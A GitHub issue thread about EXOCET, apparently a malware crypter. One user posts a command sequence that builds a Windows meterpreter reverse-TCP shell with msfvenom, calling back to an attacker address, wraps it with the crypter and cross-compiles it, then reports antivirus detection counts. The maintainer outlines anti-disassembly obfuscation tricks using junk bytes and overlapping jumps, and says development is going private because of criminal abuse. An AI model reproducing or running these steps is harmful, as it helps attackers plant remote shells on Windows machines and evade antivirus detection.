Its detectable by 26 AVs

[Netskeepy]

1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=443 -f exe > shell.exe
2. go run exocet.go ../shell.exe outputmalware.go pass123
3. env GOOS=windows GOARCH=amd64 go build outputmalware.go

VIRUSTOTAL: 26 Eng

[stuxnet8t8]

Don't upload to virustotal ffs

[tanc7]

Oh sorry, I misread it @Okta16 . Replying from gmail lol. Anyways, further EXOCET development is going to be private release only and will have features I will pick up from the MCSI MCD Certification which will allow me to use Control Flow Flattening looping into Opaque Predicates, looping back into several Dominant Functions, while C executing inline assembly will be implementing rogue bytes (invalid bytes starting with 0xfg) with interweaved jump instructions

1. First short JMP 40 with those 40 bytes jumping over containing invalid bytes to mangle static analysis
2. Second JMP -25 bytes that land in a embedded JMP instruction that jumps forward 127 bytes
3. So the real entry point is 127-40.

That's a simple way to put it. The MCSI MCD is probably the most comprehensive course I found in deobfuscating and obfuscating malware. https://www.mosse-institute.com/certifications/mcd-certified-code-deobfuscation-specialist.html

From now on, EXOCET development is locked due to d-bags abusing the repo and drawing CRIMINAL liability to me. All future releases will be private release only

[tanc7]

*heart*

…

Sent from my iPhone

On Sep 6, 2022, at 11:57 AM, Okta16 ***@***.***> wrote:  I was not talking to you lol — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you commented.